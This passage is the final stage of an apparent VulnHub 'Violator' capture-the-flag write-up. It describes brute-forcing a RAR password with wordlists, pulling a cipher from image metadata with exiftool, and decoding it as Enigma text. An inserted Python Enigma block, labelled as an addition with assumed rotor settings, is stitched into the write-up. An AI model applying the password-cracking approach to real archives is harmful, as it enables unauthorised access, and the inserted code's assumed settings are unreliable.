root@mrb3n:~/violator# curl -O http://192.168.110.183/crocs.rar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  137k  100  137k    0     0  20.6M      0 --:--:-- --:--:-- --:--:-- 22.3M
root@mrb3n:~/violator# file crocs.rar
crocs.rar: RAR archive data, v1d, os: Win32
root@mrb3n:~/violator# unrar e crocs.rar

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Extracting from crocs.rar

Enter password (will not be echoed) for artwork.jpg:
Hmm, a password protected rar containing an image file. I was stuck here for a while. First I used Cewl to create a word list based on our original Wikipedia page but had no luck. I then ran the earlier song list without spaces that got us our user accounts and still no luck. Combining everything I had and using a quick rar brute force Python script I got a result.
This time exiftool gave us something juicy, which I believe is our Enigma code.
root@mrb3n:~/violator# wine /root/Desktop/exiftool.exe artwork.jpg
ExifTool Version Number         : 10.07
File Name                       : artwork.jpg
Directory                       : .
File Size                       : 183 kB
File Modification Date/Time     : 2016:06:12 14:38:12-04:00
File Access Date/Time           : 2016:09:16 21:03:34-04:00
File Creation Date/Time         : 2016:06:12 14:38:12-04:00
File Permissions                : rw-rw-rw-
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : Violator
Software                        : Google
Artist                          : Dave Gaham
Copyright                       : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Exif Version                    : 0220
Date/Time Original              : 1990:03:19 22:13:30
Create Date                     : 1990:03:19 22:13:30
Sub Sec Time Original           : 04
Sub Sec Time Digitized          : 04
Exif Image Width                : 1450
Exif Image Height               : 1450
XP Title                        : Violator
XP Author                       : Dave Gaham
XP Keywords                     : created by user dg
XP Subject                      : policyoftruth
Padding                         : (Binary data 1590 bytes, use -b option to extract)
About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights                          : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator                         : Dave Gaham
Subject                         : created by user dg
Title                           : Violator
Description                     : Violator
Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
Date Acquired                   : 1941:05:09 10:30:18.134
Last Keyword XMP                : created by user dg
Image Width                     : 1450
Image Height                    : 1450
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1450x1450
Megapixels                      : 2.1
Create Date                     : 1990:03:19 22:13:30.04
Date/Time Original              : 1990:03:19 22:13:30.04
I was unable to get the Minarke program to work but the following decoder decoded the text for me. I just had to fix up the spacing to fully read the message.
ONE FINAL CHALLENGE FOR YOU BGHX
CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR
ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE IN TO KEEP YOU ON YOUR TOES
ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR
SHOUT OUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN
KNIGHTMARE
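If the Minarke emulator will not cooperate, the faith_and_devotion settings (Wehrmacht 3-rotor, reflector B, positions A B C, ring settings C B A, plugboard A-B C-D) are easy to replay in a few lines of Python. The block below is an added example, not code from the original post or from Minarke; it assumes rotors I, II, III left to right, which the file does not specify, and is checked against the well-known Enigma I test vector (AAAAA with everything at A gives BDZGO).

```python
# Added example (not the page's or Minarke's code): a minimal Wehrmacht/M3
# Enigma used to replay the faith_and_devotion settings on the Copyright/Rights
# string from artwork.jpg. Rotor choice I, II, III is an assumption.
ROTORS = {  # wiring, turnover notch (window letter at which the rotor kicks its neighbour)
    "I":   ("EKMFLGDQVZNTOWYHXUSPAIBRCJ", "Q"),
    "II":  ("AJDKSIRUXBLHWTMCQGZNPYFVOE", "E"),
    "III": ("BDFHJLCPRTXVZNYEIWGAKMUSQO", "V"),
    "IV":  ("ESOVPZJAYQUIRHXLNFTGKDCMWB", "J"),
    "V":   ("VZBRGITYUPSDNHLXAWMJQOFECK", "Z"),
}
REFLECTORS = {"B": "YRUHQSLDPXNGOKMIEBFZCWVJAT", "C": "FVPJIAOYEDRZXWGCTKUQSBNMHL"}
A = ord("A")

def enigma(text, rotors=("I", "II", "III"), reflector="B",
           positions="AAA", rings="AAA", plugboard=""):
    """Encrypt or decrypt text (the machine is reciprocal); non-letters are dropped."""
    plug = {}
    for pair in plugboard.split():            # "AB CD" swaps A<->B and C<->D
        plug[pair[0]], plug[pair[1]] = pair[1], pair[0]
    wires = [ROTORS[r][0] for r in rotors]
    notch = [ord(ROTORS[r][1]) - A for r in rotors]
    pos = [ord(c) - A for c in positions]     # window letters, left to right
    ring = [ord(c) - A for c in rings]        # Ringstellung, left to right
    refl = REFLECTORS[reflector]
    out = []
    for ch in text.upper():
        if not "A" <= ch <= "Z":
            continue
        # Step before each key: right rotor always; middle when the right rotor
        # is at its notch, or when the middle itself is (the double step).
        if pos[1] == notch[1]:
            pos[0] = (pos[0] + 1) % 26
            pos[1] = (pos[1] + 1) % 26
        elif pos[2] == notch[2]:
            pos[1] = (pos[1] + 1) % 26
        pos[2] = (pos[2] + 1) % 26
        c = ord(plug.get(ch, ch)) - A
        for i in (2, 1, 0):                   # right to left through the rotors
            off = pos[i] - ring[i]
            c = (ord(wires[i][(c + off) % 26]) - A - off) % 26
        c = ord(refl[c]) - A
        for i in (0, 1, 2):                   # back left to right, inverse wiring
            off = pos[i] - ring[i]
            c = (wires[i].index(chr((c + off) % 26 + A)) - off) % 26
        out.append(plug.get(chr(c + A), chr(c + A)))
    return "".join(out)

def violator(text):
    """faith_and_devotion: rotors I II III, reflector B, positions ABC, rings CBA, plugboard A-B C-D."""
    return enigma(text, ("I", "II", "III"), "B", "ABC", "CBA", "AB CD")
```

Paste the Copyright string from the exiftool output into violator() to recover the message; because the machine is reciprocal, running the plaintext back through the same settings reproduces the ciphertext.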
An update on knightmare’s Twitter here tells us that the final message should read BGH 393X. A little research leads us to this message board which tells us that this is the license plate for a 1981 Ford Corina MkV in the music video for the Depeche Mode song ‘Useless’.
Overall this one was a fun VM with plenty of twists and turns. I learned some new techniques and about the band Depeche Mode. Thank you knightmare for the challenge and sharing a bit of culture with us.
As always, thank you to g0tmi1k and the vulnhub team for maintaining this great resource/community.